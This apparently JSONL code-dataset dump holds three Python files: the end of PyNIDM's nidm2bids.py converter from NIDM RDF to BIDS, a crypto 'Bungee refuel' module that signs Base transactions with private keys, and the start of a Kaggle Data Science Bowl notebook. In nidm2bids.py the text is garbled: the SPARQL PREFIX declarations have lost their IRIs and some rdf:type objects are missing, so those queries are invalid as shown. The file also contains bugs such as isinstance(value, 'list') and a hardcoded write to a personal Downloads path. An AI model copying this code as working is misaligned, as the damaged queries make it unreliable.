variable=temp_dict[\"http://purl.org/nidash/nidm#sourceVariable\"],\n )\n )\n\n de = {}\n de[current_tuple] = {}\n # now look for label entry in temp_dict and set up a proper NIDM-style JSON data structure\n # see Utils.py function map_variables_to_terms for example (column_to_terms[current_tuple])\n for key, value in temp_dict.items():\n if key == \"http://purl.org/nidash/nidm#sourceVariable\":\n de[current_tuple][\"source_variable\"] = value\n elif key == \"http://purl.org/dc/terms/description\":\n de[current_tuple][\"description\"] = value\n elif key == \"http://purl.org/nidash/nidm#isAbout\":\n # here we need to do an additional query to see if there's a label associated with the isAbout value\n de[current_tuple][\"isAbout\"] = []\n\n # check whether there are multiple 'isAbout' entries\n if isinstance(value, \"list\"):\n # if this is a list we have to loop through the entries and store the url and labels\n for entry in value:\n # query for label for this isAbout URL\n query = f\"\"\"\n\n prefix prov: \n prefix rdfs: \n prefix rdf: \n\n select distinct ?label\n where {{\n <{entry}> rdf:type prov:Entity ;\n rdfs:label ?label .\n }}\n \"\"\"\n # print(query)\n qres = nidm_graph.query(query)\n\n for row in qres:\n de[current_tuple][\"isAbout\"].append(\n {\"@id\": value, \"label\": row[0]}\n )\n else:\n # only 1 isAbout entry\n # query for label for this isAbout URL\n query = f\"\"\"\n\n prefix prov: \n prefix rdfs: \n prefix rdf: \n\n select distinct ?label\n where {{\n <{value}> rdf:type prov:Entity ;\n rdfs:label ?label .\n }}\n \"\"\"\n # print(query)\n qres = nidm_graph.query(query)\n for row in qres:\n de[current_tuple][\"isAbout\"].append({\"@id\": value, \"label\": row[0]})\n\n elif key == \"http://www.w3.org/2000/01/rdf-schema#label\":\n de[current_tuple][\"label\"] = value\n elif key == \"http://purl.org/nidash/nidm#valueType\":\n if \"responseOptions\" not in de[current_tuple].keys():\n de[current_tuple][\"responseOptions\"] = {}\n de[current_tuple][\"responseOptions\"][\"valueType\"] = value\n else:\n de[current_tuple][\"responseOptions\"][\"valueType\"] = value\n elif key == \"http://purl.org/nidash/nidm#levels\":\n if \"responseOptions\" not in de[current_tuple].keys():\n de[current_tuple][\"responseOptions\"] = {}\n de[current_tuple][\"responseOptions\"][\"levels\"] = value\n else:\n de[current_tuple][\"responseOptions\"][\"levels\"] = value\n elif key == \"http://uri.interlex.org/ilx_0739289\":\n de[current_tuple][\"associatedWith\"] = value\n elif key == Constants.NIDM[\"minValue\"]:\n 
de[current_tuple][\"responseOptions\"][\"minValue\"] = value\n elif key == Constants.NIDM[\"maxValue\"]:\n de[current_tuple][\"responseOptions\"][\"maxValue\"] = value\n elif key == Constants.NIDM[\"url\"]:\n de[current_tuple][\"url\"] = value\n\n return de\n\n\ndef CreateBIDSParticipantFile(nidm_graph, output_file, participant_fields):\n \"\"\"\n Creates participant file based on requested fields\n\n :param nidm_graph:\n :param output_directory:\n :param fields:\n :return:\n \"\"\"\n\n print(\"Creating participants.json file...\")\n fields = [\"participant_id\"]\n # fields.extend(participant_fields)\n participants = pd.DataFrame(columns=fields, index=[1])\n participants_json = {}\n\n # for each Constants.NIDM_SUBJECTID in NIDM file\n row_index = 1\n for subj_uri, subj_id in nidm_graph.subject_objects(\n predicate=URIRef(Constants.NIDM_SUBJECTID.uri)\n ):\n # adding subject ID to data list to append to participants data frame\n participants.loc[\n row_index,\n \"participant_id\",\n ] = subj_id\n\n # for each of the fields in the participants list\n for fields in participant_fields:\n # if field identifier isn't a proper URI then do a fuzzy search on the graph, else an explicit search for the URL\n if validators.url(fields):\n # then this is a valid URI so simply query nidm_project document for it\n for _, obj in nidm_graph.subject_objects(\n predicate=URIRef(BIDS_Constants.participants[fields].uri)\n ):\n # add row to the pandas data frame\n # data.append(obj)\n participants.loc[\n row_index, BIDS_Constants.participants[fields].uri\n ] = obj\n\n # find Data Element and add metadata to participants_json dictionary\n\n else:\n # text matching task, remove basepart of URIs and try to fuzzy match the field in the part_fields parameter string\n # to the \"term\" part of a qname URI...this part let's a user simply ask for \"age\" for example without knowing the\n # complete URI....hopefully\n #\n # This needs to be a more complex query:\n # Step(1): For subj_uri query for prov:Activity that were prov:wasAttributedTo subj_uri\n # Step(2): Query for prov:Entity that were prov:wasGeneratedBy uris from Step(1)\n # Step(3): For each metadata triple in objects whose subject is uris from Step(2), fuzzy match predicate after\n # removing base of uri to \"fields\" in participants list, then add these to data list for appending to pandas\n #\n # Steps(1):(3)\n\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX onli: \n PREFIX sio: \n PREFIX niiri: \n\n SELECT DISTINCT ?pred ?value\n WHERE {{\n ?asses_activity prov:qualifiedAssociation ?_blank .\n ?_blank rdf:type prov:Association ;\n prov:agent <{subj_uri}> ;\n prov:hadRole sio:Subject .\n\n ?entities prov:wasGeneratedBy ?asses_activity ;\n rdf:type onli:assessment-instrument ;\n ?pred ?value .\n FILTER (regex(str(?pred) ,\"{fields}\",\"i\" ))\n }}\"\"\"\n # print(query)\n qres = nidm_graph.query(query)\n\n for row in qres:\n # use last field in URIs for short column name and add full URI to sidecar participants.json file\n url_parts = urllib.parse.urlsplit(row[0], scheme=\"#\")\n\n if url_parts.fragment == \"\":\n # do some parsing of the path URL because this particular one has no fragments\n url_parts = urllib.parse.urlparse(row[0])\n path_parts = url_parts[2].rpartition(\"/\")\n short_name = path_parts[2]\n else:\n short_name = url_parts.fragment\n\n # find Data Element and add metadata to participants_json dictionary\n if \"de\" not in locals():\n de = GetDataElementMetadata(nidm_graph, short_name)\n else:\n 
de.update(GetDataElementMetadata(nidm_graph, short_name))\n\n participants.loc[row_index, str(short_name)] = str(row[1])\n # data.append(str(row[1]))\n\n # add row to participants DataFrame\n # participants=participants.append(pd.DataFrame(data))\n row_index += 1\n\n # save participants.tsv file\n participants.to_csv(output_file + \".tsv\", sep=\"\\t\", index=False)\n # save participants.json file\n with open(output_file + \".json\", \"w\", encoding=\"utf-8\") as f:\n json.dump(participants_json, f, sort_keys=True, indent=2)\n\n # save participant sidecar file\n write_json_mapping_file(de, join(splitext(output_file)[0] + \".json\"), True)\n\n return participants, participants_json\n\n\ndef NIDMProject2BIDSDatasetDescriptor(nidm_graph, output_directory):\n \"\"\"\n :param nidm_graph: RDFLib graph object from NIDM-Exp file\n :param output_dir: directory for writing dataset_description of BIDS dataset\n :return: None\n \"\"\"\n\n print(\"Creating dataset_description.json file...\")\n\n # Project -> Dataset_description.json############################################\n # get json representation of project metadata\n project_metadata = nidm_graph.get_metadata_dict(Constants.NIDM_PROJECT)\n # print(project_metadata)\n\n # cycle through keys converting them to BIDS keys\n # make copy of project_metadata\n project_metadata_tmp = dict(project_metadata)\n # iterate over the temporary dictionary and delete items from the original\n for proj_key in project_metadata_tmp:\n key_found = 0\n # print(f\"proj_key = {proj_key} \")\n # print(f\"project_metadata[proj_key] = {project_metadata[proj_key]}\")\n\n for key, value in BIDS_Constants.dataset_description.items():\n if value._uri == proj_key:\n # added since BIDS validator validates values of certain keys\n if key in (\"Authors\", \"Funding\", \"ReferencesAndLinks\"):\n project_metadata[key] = [project_metadata[proj_key]]\n else:\n project_metadata[key] = project_metadata[proj_key]\n del project_metadata[proj_key]\n key_found = 1\n continue\n # if this proj_key wasn't found in BIDS dataset_description Constants dictionary then delete it\n if not key_found:\n del project_metadata[proj_key]\n\n with open(\n join(output_directory, \"dataset_description.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(project_metadata, f, sort_keys=True, indent=2)\n\n\ndef AddMetadataToImageSidecar(graph_entity, graph, output_directory, image_filename):\n \"\"\"\n This function will query the metadata in graph_entity and compare the entries with mappings in\n core/BIDS_Constants.py json_keys where we'll be mapping the value (NIDM entry) to key (BIDS key). 
It\n will create the appropriate sidecar json file associated with image_filename in output_directory.\n \"\"\"\n\n # query graph for metadata associated with graph_entity\n query = f\"\"\"\n Select DISTINCT ?p ?o\n WHERE {{\n <{graph_entity}> ?p ?o .\n }}\n \"\"\"\n qres = graph.query(query)\n\n # dictionary to store metadata\n json_dict = {}\n for row in qres:\n key = next(\n (k for k, v in BIDS_Constants.json_keys.items() if v == row[0]),\n None,\n )\n if key is not None:\n json_dict[key] = row[1]\n\n # write json_dict out to appropriate sidecar filename\n with open(\n join(output_directory, image_filename + \".json\"), \"w\", encoding=\"utf-8\"\n ) as fp:\n json.dump(json_dict, fp, indent=2)\n\n\ndef ProcessFiles(graph, scan_type, output_directory, project_location, args):\n \"\"\"\n This function will essentially cycle through the acquisition objects in the NIDM file loaded into graph\n and depending on the scan_type will try and copy the image to the output_directory\n \"\"\"\n\n if scan_type == Constants.NIDM_MRI_DIFFUSION_TENSOR.uri:\n bids_ext = \"dwi\"\n elif scan_type == Constants.NIDM_MRI_ANATOMIC_SCAN.uri:\n bids_ext = \"anat\"\n elif scan_type == Constants.NIDM_MRI_FUNCTION_SCAN.uri:\n bids_ext = \"func\"\n\n # query NIDM document for acquisition entity \"subjects\" with predicate nidm:hasImageUsageType and object scan_type\n for acq in graph.subjects(\n predicate=URIRef(Constants.NIDM_IMAGE_USAGE_TYPE.uri), object=URIRef(scan_type)\n ):\n # first see if file exists locally. Get nidm:Project prov:Location and append the nfo:Filename of the image\n # from the acq acquisition entity. If that file doesn't exist try the prov:Location in the func acq\n # entity and see if we can download it from the cloud\n\n # get acquisition uuid from entity uuid\n temp = graph.objects(subject=acq, predicate=Constants.PROV[\"wasGeneratedBy\"])\n for item in temp:\n activity = item\n # get participant ID with sio:Subject role in anat_acq qualified association\n part_id = GetParticipantIDFromAcquisition(\n nidm_file_list=[args.rdf_file], acquisition=activity\n )\n\n # make BIDS sub directory\n if \"sub\" in (part_id[\"ID\"].values)[0]:\n sub_dir = join(output_directory, (part_id[\"ID\"].values)[0])\n else:\n sub_dir = join(output_directory, \"sub-\" + (part_id[\"ID\"].values)[0])\n sub_filename_base = \"sub-\" + (part_id[\"ID\"].values)[0]\n if not os.path.exists(sub_dir):\n os.makedirs(sub_dir)\n\n # make BIDS scan type directory (bids_ext) directory\n if not os.path.exists(join(sub_dir, bids_ext)):\n os.makedirs(join(sub_dir, bids_ext))\n\n for filename in graph.objects(\n subject=acq, predicate=URIRef(Constants.NIDM_FILENAME.uri)\n ):\n # check if file exists\n for location in project_location:\n # if MRI exists in this location then copy and rename\n if isfile((location[0] + filename).lstrip(\"file:\")):\n # copy and rename file to be BIDS compliant\n copyfile(\n (location[0] + filename).lstrip(\"file:\"),\n join(\n sub_dir, bids_ext, sub_filename_base + splitext(filename)[1]\n ),\n )\n continue\n # if the file wasn't accessible locally, try with the prov:Location in the acq\n for location in graph.objects(\n subject=acq, predicate=URIRef(Constants.PROV[\"Location\"])\n ):\n # try to download the file and rename\n ret = GetImageFromURL(location)\n if ret == -1:\n print(\n f\"ERROR! 
Can't download file: {filename} from url: {location}, trying to copy locally....\"\n )\n if \"file\" in location:\n location = str(location).lstrip(\"file:\")\n print(f\"Trying to copy file from {location}\")\n try:\n copyfile(\n location,\n join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(filename),\n ),\n )\n\n except Exception:\n print(\n f\"ERROR! Failed to find file {location} on filesystem...\"\n )\n if not args.no_downloads:\n try:\n print(\n f\"Running datalad get command on dataset: {location}\"\n )\n dl.Dataset(os.path.dirname(location)).get(\n recursive=True, jobs=1\n )\n\n except Exception as e:\n print(\n f\"ERROR! Datalad returned error: {type(e)} for dataset {location}.\"\n )\n GetImageFromAWS(\n location=location,\n output_file=join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(filename),\n ),\n args=args,\n )\n\n else:\n # copy temporary file to BIDS directory\n copyfile(\n ret,\n join(output_directory, sub_dir, bids_ext, basename(filename)),\n )\n\n # if we were able to copy the image file then add the json sidecar file with additional metadata\n # available in the NIDM file\n if isfile(\n join(output_directory, sub_dir, bids_ext, basename(filename))\n ):\n # get rest of metadata for this acquisition and store in sidecar file\n if \"gz\" in basename(filename):\n image_filename = splitext(splitext(basename(filename))[0])[0]\n else:\n image_filename = splitext(basename(filename))[0]\n AddMetadataToImageSidecar(\n graph_entity=acq,\n graph=graph,\n output_directory=join(output_directory, sub_dir, bids_ext),\n image_filename=image_filename,\n )\n\n # if this is a DWI scan then we should copy over the b-value and b-vector files\n if bids_ext == \"dwi\":\n # search for entity uuid with rdf:type nidm:b-value that was generated by activity\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX nidm: \n\n SELECT DISTINCT ?entity\n WHERE {{\n ?entity rdf:type ;\n prov:wasGeneratedBy <{activity}> .\n }}\"\"\"\n # print(query)\n qres = graph.query(query)\n\n for row in qres:\n bval_entity = str(row[0])\n\n # if the file wasn't accessible locally, try with the prov:Location in the acq\n for location in graph.objects(\n subject=URIRef(bval_entity),\n predicate=URIRef(Constants.PROV[\"Location\"]),\n ):\n # try to download the file and rename\n ret = GetImageFromURL(location)\n if ret == -1:\n print(\n f\"ERROR! Can't download file: {filename} from url: {location}, trying to copy locally....\"\n )\n if \"file\" in location:\n location = str(location).lstrip(\"file:\")\n print(f\"Trying to copy file from {location}\")\n try:\n copyfile(\n location,\n join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n )\n except Exception:\n print(\n f\"ERROR! Failed to find file {location} on filesystem...\"\n )\n if not args.no_downloads:\n try:\n print(\n f\"Running datalad get command on dataset: {location}\"\n )\n dl.Dataset(os.path.dirname(location)).get(\n recursive=True, jobs=1\n )\n\n except Exception as e:\n print(\n f\"ERROR! 
Datalad returned error: {type(e)} for dataset {location}.\"\n )\n GetImageFromAWS(\n location=location,\n output_file=join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n args=args,\n )\n # search for entity uuid with rdf:type nidm:b-value that was generated by activity\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX nidm: \n\n SELECT DISTINCT ?entity\n WHERE {{\n ?entity rdf:type ;\n prov:wasGeneratedBy <{activity}> .\n }}\"\"\"\n # print(query)\n qres = graph.query(query)\n\n for row in qres:\n bvec_entity = str(row[0])\n\n # if the file wasn't accessible locally, try with the prov:Location in the acq\n for location in graph.objects(\n subject=URIRef(bvec_entity),\n predicate=URIRef(Constants.PROV[\"Location\"]),\n ):\n # try to download the file and rename\n ret = GetImageFromURL(location)\n if ret == -1:\n print(\n f\"ERROR! Can't download file: {filename} from url: {location}, trying to copy locally....\"\n )\n if \"file\" in location:\n location = str(location).lstrip(\"file:\")\n print(f\"Trying to copy file from {location}\")\n try:\n copyfile(\n location,\n join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n )\n except Exception:\n print(\n f\"ERROR! Failed to find file {location} on filesystem...\"\n )\n if not args.no_downloads:\n try:\n print(\n f\"Running datalad get command on dataset: {location}\"\n )\n dl.Dataset(os.path.dirname(location)).get(\n recursive=True, jobs=1\n )\n\n except Exception as e:\n print(\n f\"ERROR! Datalad returned error: {type(e)} for dataset {location}.\"\n )\n GetImageFromAWS(\n location=location,\n output_file=join(\n output_directory,\n sub_dir,\n bids_ext,\n basename(location),\n ),\n args=args,\n )\n\n\ndef main():\n parser = ArgumentParser(\n description=\"This program will convert a NIDM-Experiment RDF document \\\n to a BIDS dataset. The program will query the NIDM-Experiment document for subjects, \\\n MRI scans, and associated assessments saving the MRI data to disk in an organization \\\n according to the BIDS specification, metadata to a participants.tsv \\\n file, the project-level metadata to a dataset_description.json file, and the \\\n assessments to *.tsv/*.json file pairs in a phenotypes directory.\",\n epilog=\"Example of use: \\\n NIDM2BIDSMRI.py -nidm_file NIDM.ttl -part_fields age,gender -bids_dir BIDS\",\n )\n\n parser.add_argument(\n \"-nidm_file\", dest=\"rdf_file\", required=True, help=\"NIDM RDF file\"\n )\n parser.add_argument(\n \"-part_fields\",\n nargs=\"+\",\n dest=\"part_fields\",\n required=False,\n help=\"Variables to add to BIDS participant file. 
Variables will be fuzzy-matched to NIDM URIs\",\n )\n parser.add_argument(\n \"-anat\",\n dest=\"anat\",\n action=\"store_true\",\n required=False,\n help=\"Include flag to add anatomical scans to BIDS dataset\",\n )\n parser.add_argument(\n \"-func\",\n dest=\"func\",\n action=\"store_true\",\n required=False,\n help=\"Include flag to add functional scans + events files to BIDS dataset\",\n )\n parser.add_argument(\n \"-dwi\",\n dest=\"dwi\",\n action=\"store_true\",\n required=False,\n help=\"Include flag to add DWI scans + Bval/Bvec files to BIDS dataset\",\n )\n parser.add_argument(\n \"-bids_dir\",\n dest=\"bids_dir\",\n required=True,\n help=\"Directory to store BIDS dataset\",\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n \"-no_downloads\",\n dest=\"no_downloads\",\n action=\"store_true\",\n required=False,\n help=\"If this flag is set then script won't attempt to download images using datalad\"\n \"and AWS S3. Default behavior is files are downloaded if they don't exist locally.\",\n )\n group.add_argument(\n \"-aws_url\",\n dest=\"aws_url\",\n required=False,\n help=\"This tool facilities export of \"\n \"user-selected information from a NIDM file to a BIDS dataset and may have to fetch images. The NIDM files contain links from\"\n \"the local filesystem used to convert BIDS to NIDM and possibly DataLad dataset links to the files if the\"\n \" original BIDS data was a DataLad dataset. Here we support 3 modes of trying to find images: (1) copy from\"\n \" the local directory space using the prov:Location information in the NIDM file; (2) fetch the images from\"\n \" a DataLad remote if the original BIDS dataset was a DataLad dataset when bids2nidm was run; (3) attempt \"\n \" to download the images via a AWS S3 link. This parameter lets the user set the base AWS S3 URL to try and\"\n \" find the images. Currently it supports using the URL provided here and adding the dataset id, subject id,\"\n \" and filename. For example, in OpenNeuro (OpenNeuro is supported by default but will serve as an example) the base AWS S3\"\n \" URL is 's3://openneuro.org'. The URL then becomes (for example) \"\n \" s3://openneuro.org/ds000002/sub-06/func/sub-06_task-probabilisticclassification_run-02_bold.nii.gz where this tool\"\n \" has added 'ds000002/sub-06/[FILENAME] to the base AWS S3 URL.\",\n )\n parser.add_argument(\n \"-dataset_string\",\n dest=\"dataset_string\",\n required=False,\n help=\"If -aws_url parameter is supplied\"\n \" this parameter (-dataset_string) is required as it will be added to the aws_baseurl to retrieve images for each\"\n \" subject and file. For example, if -aws_baseurl is 's3://davedata.org ' and -dataset_string is 'dataset1' then\"\n \" the AWS S3 url for sub-1 and file sub1-task-rest_run-1_bold.nii.gz would be: \"\n \" 's3://davedata.org/dataset1/sub-1/[anat | func | dwi/sub1-task-rest_run-1_bold.nii.gz'\",\n )\n\n args = parser.parse_args()\n\n # check some argument dependencies\n if args.aws_url and not args.dataset_string:\n print(\n \"ERROR! You must include a -dataset_string if you supplied the -aws_baseurl. 
If there is no dataset\"\n \" string in your AWS S3 urls then just supply -aws_baseurl with nothing after it.\"\n )\n print(args.print_help())\n sys.exit(-1)\n\n # set up some local variables\n rdf_file = args.rdf_file\n output_directory = args.bids_dir\n\n # check if output directory exists, if not create it\n if not isdir(output_directory):\n mkdir(path=output_directory)\n\n # try to read RDF file\n print(\"Guessing RDF file format...\")\n format_found = False\n for fmt in \"turtle\", \"xml\", \"n3\", \"trix\", \"rdfa\":\n try:\n print(f\"Reading RDF file as {fmt}...\")\n # load NIDM graph into NIDM-Exp API objects\n nidm_project = read_nidm(rdf_file)\n # temporary save nidm_project\n with open(\"/Users/dbkeator/Downloads/nidm.ttl\", \"w\", encoding=\"utf-8\") as f:\n print(nidm_project.serializeTurtle(), file=f)\n print(\"RDF file successfully read\")\n format_found = True\n break\n except Exception:\n print(f\"File: {rdf_file} appears to be an invalid {fmt} RDF file\")\n\n if not format_found:\n print(\n \"File doesn't appear to be a valid RDF format supported by Python RDFLib! Please check input file\"\n )\n print(\"exiting...\")\n sys.exit(-1)\n\n # if not os.path.isdir(join(output_directory,os.path.splitext(args.rdf_file)[0])):\n # os.mkdir(join(output_directory,os.path.splitext(args.rdf_file)[0]))\n\n # convert Project NIDM object -> dataset_description.json file\n NIDMProject2BIDSDatasetDescriptor(nidm_project, output_directory)\n\n # create participants.tsv file. In BIDS datasets there is no specification for how many or which type of assessment\n # variables might be in this file. The specification does mention a minimum participant_id which indexes each of the\n # subjects in the BIDS dataset.\n #\n # if parameter -parts_field is defined then the variables listed will be fuzzy matched to the URIs in the NIDM file\n # and added to the participants.tsv file\n\n # use RDFLib here for temporary graph making query easier\n rdf_graph = Graph()\n rdf_graph_parse = rdf_graph.parse(\n source=StringIO(nidm_project.serializeTurtle()), format=\"turtle\"\n )\n\n # temporary write out turtle file for testing\n # rdf_graph_parse.serialize(destination=\"/Users/dbkeator/Downloads/ds000117.ttl\", format='turtle')\n\n # create participants file\n CreateBIDSParticipantFile(\n rdf_graph_parse, join(output_directory, \"participants\"), args.part_fields\n )\n\n # get nidm:Project prov:Location\n # first get nidm:Project UUIDs\n project_uuid = GetProjectsUUID([rdf_file], output_file=None)\n project_location = []\n for uuid in project_uuid:\n project_location.append(\n GetProjectLocation(nidm_file_list=[rdf_file], project_uuid=uuid)\n )\n\n # creating BIDS hierarchy with requested scans\n if args.anat is True:\n ProcessFiles(\n graph=rdf_graph_parse,\n scan_type=Constants.NIDM_MRI_ANATOMIC_SCAN.uri,\n output_directory=output_directory,\n project_location=project_location,\n args=args,\n )\n\n if args.func is True:\n ProcessFiles(\n graph=rdf_graph_parse,\n scan_type=Constants.NIDM_MRI_FUNCTION_SCAN.uri,\n output_directory=output_directory,\n project_location=project_location,\n args=args,\n )\n if args.dwi is True:\n ProcessFiles(\n graph=rdf_graph_parse,\n scan_type=Constants.NIDM_MRI_DIFFUSION_TENSOR.uri,\n output_directory=output_directory,\n project_location=project_location,\n args=args,\n )\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"incf-nidash/PyNIDM","sub_path":"src/nidm/experiment/tools/nidm2bids.py","file_name":"nidm2bids.py","file_ext":"py","file_size_in_byte":40525,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"33769048787","text":"import random\nfrom typing import Union\n\nfrom loguru import logger\nfrom web3 import Web3\nfrom config import BUNGEE_ABI, BUNGEE_CONTRACT\nfrom .account import Account\nfrom utils.bungee_data import get_bungee_data\n\n\ndef get_bungee_limits() -> Union[dict, bool]:\n bungee_data = get_bungee_data()\n\n try:\n limits = [chain_data for chain_data in bungee_data if chain_data[\"name\"] == \"Base\"][0][\"limits\"]\n\n return limits\n except:\n return False\n\n\nclass Bungee(Account):\n def __init__(self, account_id: int, private_key: str) -> None:\n super().__init__(account_id=account_id, private_key=private_key, chain=\"base\")\n\n self.contract = self.get_contract(BUNGEE_CONTRACT, BUNGEE_ABI)\n self.chain_ids = {\n \"BSC\": 56,\n \"OPTIMISM\": 10,\n \"GNOSIS\": 100,\n \"POLYGON\": 137,\n \"ZKSYNC\": 324,\n \"ARBITRUM\": 42161,\n \"AVALANCHE\": 43114,\n \"AURORA\": 1313161554,\n \"ZK_EVM\": 1101,\n }\n\n def get_tx_data(self, amount: int):\n tx = {\n \"from\": self.address,\n \"gasPrice\": self.w3.eth.gas_price,\n \"nonce\": self.w3.eth.get_transaction_count(self.address),\n \"value\": amount\n }\n return tx\n\n def refuel(self, chain_list: list, random_amount: bool):\n limits = get_bungee_limits()\n\n to_chain = random.choice(chain_list)\n\n try:\n to_chain_limits = [\n chain for chain in limits if chain[\"chainId\"] == self.chain_ids[to_chain] and chain[\"isEnabled\"]\n ]\n\n if to_chain_limits:\n min_amount = int(to_chain_limits[0][\"minAmount\"])\n max_amount = int(to_chain_limits[0][\"maxAmount\"])\n\n amount = random.randint(min_amount, max_amount) if random_amount else min_amount\n\n logger.info(\n f\"[{self.account_id}][{self.address}] Make refuel to \" +\n f\"{to_chain.title()} | {Web3.from_wei(amount, 'ether')} ETH\"\n )\n\n transaction = self.contract.functions.depositNativeToken(\n self.chain_ids[to_chain],\n self.address\n ).build_transaction(self.get_tx_data(amount))\n\n signed_txn = self.sign(transaction)\n\n txn_hash = self.send_raw_transaction(signed_txn)\n\n self.wait_until_tx_finished(txn_hash.hex())\n else:\n logger.error(f\"[{self.account_id}][{self.address}] Bungee refuel destination chain inactive!\")\n except Exception as e:\n logger.error(f\"[{self.account_id}][{self.address}] Bungee refuel error | error {e}\")\n","repo_name":"Samogonshikua/BASE.","sub_path":"modules/bungee.py","file_name":"bungee.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71050282171","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\nimport matplotlib.pyplot as plt\n\nimport xgboost as xgb\n\nfrom xgboost import XGBClassifier, XGBRegressor\n\nfrom xgboost import plot_importance\n\nfrom matplotlib import pyplot\n\n#import shap\n\n\n\nimport os\n\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n\n    for filename in filenames:\n\n        print(os.path.join(dirname, filename))\n\n\n\n# Any results you write to the current directory are saved as output.\n\nfrom time import time\n\nfrom tqdm import tqdm_notebook as tqdm\n\nfrom collections import Counter\n\nfrom scipy import stats\n\nimport lightgbm as lgb\n\nfrom sklearn.metrics import cohen_kappa_score\n\nfrom sklearn.model_selection import KFold, StratifiedKFold\n\nimport gc\n\nimport json\n\nfrom typing import Dict\n\npd.set_option('display.max_columns', 1000)\ndef eval_qwk_lgb_regr(y_true, y_pred):\n\n    \"\"\"\n\n    Fast cappa eval function for lgb.\n\n    \"\"\"\n\n    dist = Counter(reduce_train['accuracy_group'])\n\n    for k in dist:\n\n        dist[k] /= len(reduce_train)\n\n    reduce_train['accuracy_group'].hist()\n\n    \n\n    acum = 0\n\n    bound = {}\n\n    for i in range(3):\n\n        acum += dist[i]\n\n        bound[i] = np.percentile(y_pred, acum * 100)\n\n\n\n    def classify(x):\n\n        if x <= bound[0]:\n\n            return 0\n\n        elif x <= bound[1]:\n\n            return 1\n\n        elif x <= bound[2]:\n\n            return 2\n\n        else:\n\n            return 3\n\n\n\n    y_pred = np.array(list(map(classify, y_pred))).reshape(y_true.shape)\n\n\n\n    return 'cappa', cohen_kappa_score(y_true, y_pred, weights='quadratic'), True\ndef cohenkappa(ypred, y):\n\n    y = y.get_label().astype(\"int\")\n\n    ypred = ypred.reshape((4, -1)).argmax(axis = 0)\n\n    loss = cohen_kappa_score(y, ypred, weights = 'quadratic')\n\n    return \"cappa\", loss, True\ndef read_data():\n\n    print('Reading train.csv file....')\n\n    train = pd.read_csv('../input/data-science-bowl-2019/train.csv')\n\n    print('Training.csv file have {} rows and {} columns'.format(train.shape[0], train.shape[1]))\n\n\n\n    print('Reading test.csv file....')\n\n    test = pd.read_csv('../input/data-science-bowl-2019/test.csv')\n\n    print('Test.csv file have {} rows and {} columns'.format(test.shape[0], test.shape[1]))\n\n\n\n    print('Reading train_labels.csv file....')\n\n    train_labels = pd.read_csv('../input/data-science-bowl-2019/train_labels.csv')\n\n    print('Train_labels.csv file have {} rows and {} columns'.format(train_labels.shape[0], train_labels.shape[1]))\n\n\n\n    print('Reading specs.csv file....')\n\n    specs = pd.read_csv('../input/data-science-bowl-2019/specs.csv')\n\n    print('Specs.csv file have {} rows and {} columns'.format(specs.shape[0], specs.shape[1]))\n\n\n\n    print('Reading sample_submission.csv file....')\n\n    sample_submission = pd.read_csv('../input/data-science-bowl-2019/sample_submission.csv')\n\n    print('Sample_submission.csv file have {} rows and {} columns'.format(sample_submission.shape[0], sample_submission.shape[1]))\n\n    return train, test, train_labels, specs, sample_submission\ndef encode_title(train, test, train_labels):\n\n    # encode title\n\n    train['title_event_code'] = list(map(lambda x, y: str(x) + '_' + str(y), train['title'], train['event_code']))\n\n    test['title_event_code'] = list(map(lambda x, y: str(x) + '_' + str(y), test['title'], test['event_code']))\n\n    all_title_event_code = list(set(train[\"title_event_code\"].unique()).union(test[\"title_event_code\"].unique()))\n\n    # make a list with all the unique 'titles' from the train and test set\n\n    list_of_user_activities = list(set(train['title'].unique()).union(set(test['title'].unique())))\n\n    # make a list with all the unique 'event_code' from the 
train and test set\n\n list_of_event_code = list(set(train['event_code'].unique()).union(set(test['event_code'].unique())))\n\n list_of_event_id = list(set(train['event_id'].unique()).union(set(test['event_id'].unique())))\n\n # make a list with all the unique worlds from the train and test set\n\n list_of_worlds = list(set(train['world'].unique()).union(set(test['world'].unique())))\n\n # create a dictionary numerating the titles\n\n activities_map = dict(zip(list_of_user_activities, np.arange(len(list_of_user_activities))))\n\n activities_labels = dict(zip(np.arange(len(list_of_user_activities)), list_of_user_activities))\n\n activities_world = dict(zip(list_of_worlds, np.arange(len(list_of_worlds))))\n\n assess_titles = list(set(train[train['type'] == 'Assessment']['title'].value_counts().index).union(set(test[test['type'] == 'Assessment']['title'].value_counts().index)))\n\n # replace the text titles with the number titles from the dict\n\n train['title'] = train['title'].map(activities_map)\n\n test['title'] = test['title'].map(activities_map)\n\n train['world'] = train['world'].map(activities_world)\n\n test['world'] = test['world'].map(activities_world)\n\n train_labels['title'] = train_labels['title'].map(activities_map)\n\n win_code = dict(zip(activities_map.values(), (4100*np.ones(len(activities_map))).astype('int')))\n\n # then, it set one element, the 'Bird Measurer (Assessment)' as 4110, 10 more than the rest\n\n win_code[activities_map['Bird Measurer (Assessment)']] = 4110\n\n # convert text into datetime\n\n train['timestamp'] = pd.to_datetime(train['timestamp'])\n\n test['timestamp'] = pd.to_datetime(test['timestamp'])\n\n \n\n \n\n return train, test, train_labels, win_code, list_of_user_activities, list_of_event_code, activities_labels, assess_titles, list_of_event_id, all_title_event_code\n# this is the function that convert the raw data into processed features\n\ndef get_data(user_sample, test_set=False):\n\n '''\n\n The user_sample is a DataFrame from train or test where the only one \n\n installation_id is filtered\n\n And the test_set parameter is related with the labels processing, that is only requered\n\n if test_set=False\n\n '''\n\n # Constants and parameters 